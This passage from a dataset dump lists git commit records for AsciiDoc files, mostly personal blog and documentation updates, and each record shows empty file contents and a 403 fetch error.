'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 
403\n","license":"isc","lang":"AsciiDoc"} {"commit":"d8a78b5e5e274fbe4f2ba92c2fa6214d849efa35","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cdf3e008b0a7481f6f5f1503e1e509b3e5a7494","subject":"y2b create post I Bet Your Headphones Can't Do This...","message":"y2b create post I Bet Your Headphones Can't Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-17-I-Bet-Your-Headphones-Cant-Do-This.adoc","new_file":"_posts\/2017-05-17-I-Bet-Your-Headphones-Cant-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fe960f738db1627b09aa42224f8c0e77aa6da56","subject":"Some research.","message":"Some research.\n","repos":"bakketun\/unicode-for-common-lisp","old_file":"research.adoc","new_file":"research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bakketun\/unicode-for-common-lisp.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17681454866a21456cee09a7d9072de4bca533f4","subject":"y2b create post iPad 5 Space Gray Leaked? (First Look + Comparison)","message":"y2b create post iPad 5 Space Gray Leaked? 
(First Look + Comparison)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-01-iPad-5-Space-Gray-Leaked-First-Look--Comparison.adoc","new_file":"_posts\/2013-10-01-iPad-5-Space-Gray-Leaked-First-Look--Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"597dc45b3e6c734e01fe83c09b1e438494044ba2","subject":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","message":"Update 2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_file":"_posts\/2016-05-17-Budapest-JS-2016-Part-II-The-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75b0c460f677329bcdc63349b393d2c893e15cba","subject":"Update 2018-07-19-Keeping-a-blockchain-decentralised.adoc","message":"Update 2018-07-19-Keeping-a-blockchain-decentralised.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-19-Keeping-a-blockchain-decentralised.adoc","new_file":"_posts\/2018-07-19-Keeping-a-blockchain-decentralised.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ab9dc098200627f1bda0baa60b58bcba7905199","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5175466ae749fead1c2c0e3eaec04459d828a4c4","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b217f4078d00c3acb5e7a8c49f663f2604f02567","subject":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to '_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc'","message":"Renamed '_posts\/2019-01-31-My-English-Title.adoc' to 
'_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc'","repos":"kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io","old_file":"_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc","new_file":"_posts\/2017-08-25-Using-slf4j-and-log4j2-with-gradle-in-Spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kwpale\/kwpale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"391e4aa056aa860a27d386eb1e761ea8126de339","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0f937882da3679c557ce293e59f739a6e17e77f","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f23fc269dd9067a97e9e6874ed3087a2d9813f","subject":"Create atom_packages.adoc","message":"Create atom_packages.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"atom_packages.adoc","new_file":"atom_packages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"c4368c15c14f8097e2045f283ea3af917b79ef8f","subject":"Include rest client multipart guide","message":"Include rest client multipart guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/rest-client-multipart-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/rest-client-multipart-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c2fb59e0dfa2ca1869cfea91759688d808ff6b1","subject":"Update 2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","message":"Update 
2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","new_file":"_posts\/2015-06-10-Eclipse-Mars-episode-3-Amelioration-de-lergonomie-de-la-console.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b75a1b18102b0b298dcb2a1da88bad5717cd3068","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4115787dff0020e08eabc5c4fcb3410f3df71e","subject":"Update 2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","message":"Update 2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","new_file":"_posts\/2016-04-08-Book-Review-The-developers-code-by-Ka-Wai-Cheung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80e6dbdc632e0998a5edbc1bfdf8a062866cde70","subject":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","message":"Update 2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","new_file":"_posts\/2016-10-23-Google-maps-zoom-theory-and-example-with-QWT-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e07e3fda38838bf85b52da7d75015a1ab3b3d9f1","subject":"Announcing hawkular-services 0.32 (#277)","message":"Announcing hawkular-services 0.32 
(#277)\n\n","repos":"pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/02\/15\/hawkular-services-0.32-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/02\/15\/hawkular-services-0.32-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df7beb42385f45d1d39f76ee4b9775496915b6ea","subject":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","message":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c243838e38e2e1b08a95a3a570d550fc7123de5","subject":"Renamed '_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","message":"Renamed '_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_file":"_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"309d868953db8d1646b8d60646f4a867568b77e8","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"9fd2eadc1711c76567846af41ee5d30d8b660def","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4de1a33973aa940ff59f79ceaa29283aac15ccd1","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f22da91a963e1de619f8e65570437fdf20ed12e6","subject":"Update 2015-11-04-Google-Big-Table.adoc","message":"Update 2015-11-04-Google-Big-Table.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-04-Google-Big-Table.adoc","new_file":"_posts\/2015-11-04-Google-Big-Table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39bb565d9dac250d43103bc1e468588f44690919","subject":"Update 2016-07-21-Curriculum-Vitae.adoc","message":"Update 2016-07-21-Curriculum-Vitae.adoc","repos":"warpcoil\/warpcoil.github.io,warpcoil\/warpcoil.github.io,warpcoil\/warpcoil.github.io,warpcoil\/warpcoil.github.io","old_file":"_posts\/2016-07-21-Curriculum-Vitae.adoc","new_file":"_posts\/2016-07-21-Curriculum-Vitae.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/warpcoil\/warpcoil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc3a059e57b871fb1c5ad8e250a9c609e97bbbff","subject":"Update 2017-02-24-Ghrome-Extension.adoc","message":"Update 2017-02-24-Ghrome-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Ghrome-Extension.adoc","new_file":"_posts\/2017-02-24-Ghrome-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30d12c2d606bc354d7bd2dcd590ab9a8ef7d7114","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 
2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c9f98b4bd68e9f96152fcac98a02469af3f0e0b","subject":"y2b create post Panasonic RP-HTX7 Headphones Unboxing","message":"y2b create post Panasonic RP-HTX7 Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-20-Panasonic-RPHTX7-Headphones-Unboxing.adoc","new_file":"_posts\/2011-07-20-Panasonic-RPHTX7-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdcc09c54661431d04ab13d289621f3f0dff7387","subject":"warning dependency not Buildscript depenency","message":"warning dependency not Buildscript depenency\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-warningDependencyNotBuildscriptDependency.adoc","new_file":"src\/main\/docs\/common-warningDependencyNotBuildscriptDependency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6cea889c1b4b9f5d265916338fd248f49554e245","subject":"Update 2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","message":"Update 2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","new_file":"_posts\/2016-07-24-Ubuntu-bash-no-Windows-Facilitando-o-dia-a-dia-do-profissional-de-TI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abb34da860f4950b4938b51dd851362c83945510","subject":"Update 2016-11-08-092300-Tuesday-Morning.adoc","message":"Update 2016-11-08-092300-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-092300-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-08-092300-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4769056559533ffafc41ac3ed8fcbb019f04c337","subject":"Update 
2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","message":"Update 2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","new_file":"_posts\/2016-11-13-Supervised-Learning-and-Unsupervised-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a31c1f61c8de5e88d8d6ddb8c210ff6f09f7faa","subject":"Update 2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","message":"Update 2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","new_file":"_posts\/2015-03-22-This-is-English-alternate-title-if-in-Japanese-this-fuild-is-required.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a84fd3cc5c3de84fe4a929a7d06b65158ce49de6","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18ba1c49ccc48493113967ebe71795453fc53e8e","subject":"Update 2016-05-22-Gotcha-with-fitness-function-design.adoc","message":"Update 2016-05-22-Gotcha-with-fitness-function-design.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Gotcha-with-fitness-function-design.adoc","new_file":"_posts\/2016-05-22-Gotcha-with-fitness-function-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b9c96bfd2f802e476991bb66fe64354b4130b47","subject":"docs: start some real design documentation","message":"docs: start some real design documentation\n","repos":"larshp\/abaplint,larshp\/abaplint,larshp\/abapOpenChecksJS,larshp\/abapOpenChecksJS,larshp\/abapOpenChecksJS,larshp\/abaplint,larshp\/abaplint","old_file":"docs\/design\/index.adoc","new_file":"docs\/design\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larshp\/abapOpenChecksJS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a2e5f42b8f70bf49c6a094d9cc8737b811776c","subject":"docs 
update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89ffc9ed4afdc08b8079848fb92aeef56ac63f84","subject":"y2b create post Nexus 7 vs iPad Mini Showdown! (New Nexus 7 2013)","message":"y2b create post Nexus 7 vs iPad Mini Showdown! (New Nexus 7 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-09-Nexus-7-vs-iPad-Mini-Showdown-New-Nexus-7-2013.adoc","new_file":"_posts\/2013-08-09-Nexus-7-vs-iPad-Mini-Showdown-New-Nexus-7-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9639dd4ccec9f507a3db0b4c8f1396533a7f0f42","subject":"Worked on AMCache documentation","message":"Worked on AMCache documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41605cfc6fc239751d16cf9c416c7bbdbef0442d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c85c14f5089ec58ae15cf7e481bd2843c579f92","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ea4aebd74d4fd4d82543d914879f5c21853358","subject":"Update 2015-03-15-NEW-J5-Breakout-Board.adoc","message":"Update 
